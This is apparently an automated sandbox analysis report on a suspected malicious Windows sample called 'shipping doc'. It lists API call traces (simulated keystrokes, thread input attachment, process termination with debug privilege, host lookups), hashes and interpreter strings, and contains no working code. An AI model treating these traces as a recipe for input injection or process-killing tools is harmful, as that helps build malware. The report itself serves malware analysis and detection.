                                                                                              • Opcode ID: e16812dc3997cfbd3e4979d909960a05d388707deb9f86c7209f0f29110abdeb
                                                                                              • Instruction ID: ec3c1dd5877d47d3db4f2507519ab6594e6850bb0029bf74039f4c53dfba58d3
                                                                                              • Opcode Fuzzy Hash: e16812dc3997cfbd3e4979d909960a05d388707deb9f86c7209f0f29110abdeb
                                                                                              • Instruction Fuzzy Hash: 26318E71200701EFDB259FA5DC44A66BBF9FF18302F04441DF96A8A611DB30E898DBE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00143A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00143A57
                                                                                                • Part of subcall function 00143A3D: GetCurrentThreadId.KERNEL32 ref: 00143A5E
                                                                                                • Part of subcall function 00143A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001425B3), ref: 00143A65
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001425BD
                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001425DB
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001425DF
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 001425E9
                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00142601
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00142605
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0014260F
                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00142623
                                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00142627
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2014098862-0
                                                                                              • Opcode ID: b30c1b312cdd18b3f3a93c2bb93bafc660deac2951ec00cfd004a95ec318bf9a
                                                                                              • Instruction ID: 4d15a0693f8419b4ea366f3bc41975e8697d65ebcc62edf31c3b2f07e048a209
                                                                                              • Opcode Fuzzy Hash: b30c1b312cdd18b3f3a93c2bb93bafc660deac2951ec00cfd004a95ec318bf9a
                                                                                              • Instruction Fuzzy Hash: 3201B530390210BBFB1067689C8AF993E69DB5AB11F510015F318AF1E1C9F114C4CAA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00141449,?,?,00000000), ref: 0014180C
                                                                                              • HeapAlloc.KERNEL32(00000000,?,00141449,?,?,00000000), ref: 00141813
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00141449,?,?,00000000), ref: 00141828
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00141449,?,?,00000000), ref: 00141830
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00141449,?,?,00000000), ref: 00141833
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00141449,?,?,00000000), ref: 00141843
                                                                                              • GetCurrentProcess.KERNEL32(00141449,00000000,?,00141449,?,?,00000000), ref: 0014184B
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00141449,?,?,00000000), ref: 0014184E
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00141874,00000000,00000000,00000000), ref: 00141868
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: 9bfc3dcaf8809ba35f30b2d346166445e591a5fd0903bf84f81e9375b326dab6
                                                                                              • Instruction ID: bb9a1cbfbd08781eea2bcc1d443e5e98a381a07000c3bcb836491b835ac6e89a
                                                                                              • Opcode Fuzzy Hash: 9bfc3dcaf8809ba35f30b2d346166445e591a5fd0903bf84f81e9375b326dab6
                                                                                              • Instruction Fuzzy Hash: 5101BBB5240308FFE710ABA5DC4DF6B3BACEB89B11F404425FA09DB5A1CA709880CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0014D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0014D501
                                                                                                • Part of subcall function 0014D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0014D50F
                                                                                                • Part of subcall function 0014D4DC: CloseHandle.KERNEL32(00000000), ref: 0014D5DC
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0016A16D
                                                                                              • GetLastError.KERNEL32 ref: 0016A180
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0016A1B3
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0016A268
                                                                                              • GetLastError.KERNEL32(00000000), ref: 0016A273
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0016A2C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 2533919879-2896544425
                                                                                              • Opcode ID: 676fe748181dfd21e62fb83acad8cd08cd55258b6aae1916098fc0ea07b25136
                                                                                              • Instruction ID: 14d154d17fbd2d8f32e6523023519698e58f1c3631c7f0a62e597b07d60bc6c4
                                                                                              • Opcode Fuzzy Hash: 676fe748181dfd21e62fb83acad8cd08cd55258b6aae1916098fc0ea07b25136
                                                                                              • Instruction Fuzzy Hash: 4161C2312042419FE720DF19C894F16BBE1AF54318F58849CE46A5BBA3C772ED85CF92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00173925
                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0017393A
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00173954
                                                                                              • _wcslen.LIBCMT ref: 00173999
                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 001739C6
                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001739F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                              • String ID: SysListView32
                                                                                              • API String ID: 2147712094-78025650
                                                                                              • Opcode ID: 5224e9b8f1197843c94a6e2fac46dc83d3a8b2ec34507b80831550ddaeb2a9e7
                                                                                              • Instruction ID: b394b04dc56e02ba4db344287bb2f2232ed2fde18e5c3f079058d06e2ededf82
                                                                                              • Opcode Fuzzy Hash: 5224e9b8f1197843c94a6e2fac46dc83d3a8b2ec34507b80831550ddaeb2a9e7
                                                                                              • Instruction Fuzzy Hash: A2419371A00219ABDB219F64CC49BEA77B9FF18354F10452AF968E7281D7719A80DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0014BCFD
                                                                                              • IsMenu.USER32(00000000), ref: 0014BD1D
                                                                                              • CreatePopupMenu.USER32 ref: 0014BD53
                                                                                              • GetMenuItemCount.USER32(018657B0), ref: 0014BDA4
                                                                                              • InsertMenuItemW.USER32(018657B0,?,00000001,00000030), ref: 0014BDCC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                              • String ID: 0$2
                                                                                              • API String ID: 93392585-3793063076
                                                                                              • Opcode ID: 4b1156d5b327efbbab8c098fe2b21d9fd5838420c3e28dda0108ae09d56c0a10
                                                                                              • Instruction ID: 635d4de9f41c607faf415958c6f0bd0a822ade2c34316d96f8985b99effa1fa3
                                                                                              • Opcode Fuzzy Hash: 4b1156d5b327efbbab8c098fe2b21d9fd5838420c3e28dda0108ae09d56c0a10
                                                                                              • Instruction Fuzzy Hash: 5251AD70A082059BDF24CFE8D8C4BAEBBF4BF55328F144299E415AB2A0D770D985CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 0014C913
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconLoad
                                                                                              • String ID: blank$info$question$stop$warning
                                                                                              • API String ID: 2457776203-404129466
                                                                                              • Opcode ID: 83991cba3a1a86386b3001708877cc14fe0e6691795f02dd7c03db894a3c8687
                                                                                              • Instruction ID: a745327382f826aa37f0a731f7d7b9c9ee884228cfa7d70882175e2b95463b82
                                                                                              • Opcode Fuzzy Hash: 83991cba3a1a86386b3001708877cc14fe0e6691795f02dd7c03db894a3c8687
                                                                                              • Instruction Fuzzy Hash: BA110D3678A317BBE7056B54DC83CAE779CDF25358B10002EF601A61E2EBB45D4052E4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 642191829-3771769585
                                                                                              • Opcode ID: 47b8ca8aa2c50d98ddc65be558b0d563d88c2dc4267e1eae26f83016f1b0caa0
                                                                                              • Instruction ID: 0978eb34d5ec4f255e6ce76f5a40c54be43ffcb3f8cd1a37f5340ca23612a21a
                                                                                              • Opcode Fuzzy Hash: 47b8ca8aa2c50d98ddc65be558b0d563d88c2dc4267e1eae26f83016f1b0caa0
                                                                                              • Instruction Fuzzy Hash: E3110671904105AFDF24AB60EC4AEEE77BCDF25710F0101ADF549A60E1EFB18AC18B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 952045576-0
                                                                                              • Opcode ID: 0002073f90b05ebcea885ddf8c48703e867b55062eb18ca156952f0bfe48cf96
                                                                                              • Instruction ID: 91b55388a8380fda78818729ff016d4f03a8fefc57186b841e1811adcd4d69d1
                                                                                              • Opcode Fuzzy Hash: 0002073f90b05ebcea885ddf8c48703e867b55062eb18ca156952f0bfe48cf96
                                                                                              • Instruction Fuzzy Hash: 2341B275C1021876CB11EBF4C88A9DFB7A8AF59310F508462E958F3162FB74E255C3A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0013682C,00000004,00000000,00000000), ref: 000FF953
                                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0013682C,00000004,00000000,00000000), ref: 0013F3D1
                                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0013682C,00000004,00000000,00000000), ref: 0013F454
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1268545403-0
                                                                                              • Opcode ID: 1630311c557f0d51897ae5d67bcc4286d677bb8e8f751ba1edabf7139bc8ab6f
                                                                                              • Instruction ID: b607341f7cabf9baac68b3d5735c7ebf535fc2d07f294ad33d4aeab9f70117e2
                                                                                              • Opcode Fuzzy Hash: 1630311c557f0d51897ae5d67bcc4286d677bb8e8f751ba1edabf7139bc8ab6f
                                                                                              • Instruction Fuzzy Hash: 2C414E3160C689BAC7789B29C88877A7BE2BF56314F54403CE24B92D71C7B298C1E751
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 00172D1B
                                                                                              • GetDC.USER32(00000000), ref: 00172D23
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00172D2E
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00172D3A
                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00172D76
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00172D87
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00175A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00172DC2
                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00172DE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3864802216-0
                                                                                              • Opcode ID: d752d12c252db2fb6524908211d332cfe642609495c613c0a437406cb0ccf55b
                                                                                              • Instruction ID: 2a32ef636091e4cc856bda47a7220f55e29d930bb3192e343e85bdc68c1e832d
                                                                                              • Opcode Fuzzy Hash: d752d12c252db2fb6524908211d332cfe642609495c613c0a437406cb0ccf55b
                                                                                              • Instruction Fuzzy Hash: 2B317C76201214BFEB218F50CC8AFEB3BB9EF09715F044059FE0C9A291D6759C91CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2931989736-0
                                                                                              • Opcode ID: 13da52b0c733f3de740847e872ee16c136076052bf81b9295414bbf1a64c8025
                                                                                              • Instruction ID: f2f6f19e688c693993b2a7fcd5e7dfed90b30b72452e8eb84f432bbbe49b2341
                                                                                              • Opcode Fuzzy Hash: 13da52b0c733f3de740847e872ee16c136076052bf81b9295414bbf1a64c8025
                                                                                              • Instruction Fuzzy Hash: 5F21C271A40A097BD31956208E82FFB336FBF21394F554034FD089A692F764ED1285A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                              • API String ID: 0-572801152
                                                                                              • Opcode ID: 59397e5c5f8dadf7dc92b2a5c62a4f32220817727bbd433897d32cc7d2191991
                                                                                              • Instruction ID: 9f7fe8d2eb3cb78d9895b9c8481885f58aadcf82f53802467d5bf6925312e894
                                                                                              • Opcode Fuzzy Hash: 59397e5c5f8dadf7dc92b2a5c62a4f32220817727bbd433897d32cc7d2191991
                                                                                              • Instruction Fuzzy Hash: 74D1D275A0060AAFDF14CFA8CC81BAEB7B6FF48344F148069E915AB281E770DD55CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(?,?), ref: 001215CE
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00121651
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001216E4
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 001216FB
                                                                                                • Part of subcall function 00113820: RtlAllocateHeap.NTDLL(00000000,?,001B1444,?,000FFDF5,?,?,000EA976,00000010,001B1440,000E13FC,?,000E13C6,?,000E1129), ref: 00113852
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00121777
                                                                                              • __freea.LIBCMT ref: 001217A2
                                                                                              • __freea.LIBCMT ref: 001217AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                              • String ID:
                                                                                              • API String ID: 2829977744-0
                                                                                              • Opcode ID: 159d5d204a10a9f356aa3dab40ac3aec41f2541fd72dc03c983f748afb730d55
                                                                                              • Instruction ID: b199c00b42a03b86f23d27b9ced089efc2995b5deb6b69aefa2a6979104e4a28
                                                                                              • Opcode Fuzzy Hash: 159d5d204a10a9f356aa3dab40ac3aec41f2541fd72dc03c983f748afb730d55
                                                                                              • Instruction Fuzzy Hash: C191C772E00226BEDF24CE74E841AEE7BB5EFA9310F184669E905E7141D735DD90CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit
                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                              • API String ID: 2610073882-625585964
                                                                                              • Opcode ID: 1656e58b36ec5131b575e5a2761eceb17435a7154c1670e7d71ea5ecac458ffc
                                                                                              • Instruction ID: 4b38eaa1bc99392f838c6285e886f213cfcb2952ee28421715b744f2b05c22f1
                                                                                              • Opcode Fuzzy Hash: 1656e58b36ec5131b575e5a2761eceb17435a7154c1670e7d71ea5ecac458ffc
                                                                                              • Instruction Fuzzy Hash: 16918B71A00219AFDF24CFA5CC88FAEBBB8EF46710F108559F516AB281D7709955CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0015125C
                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00151284
                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001512A8
                                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001512D8
                                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0015135F
                                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001513C4
                                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00151430
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
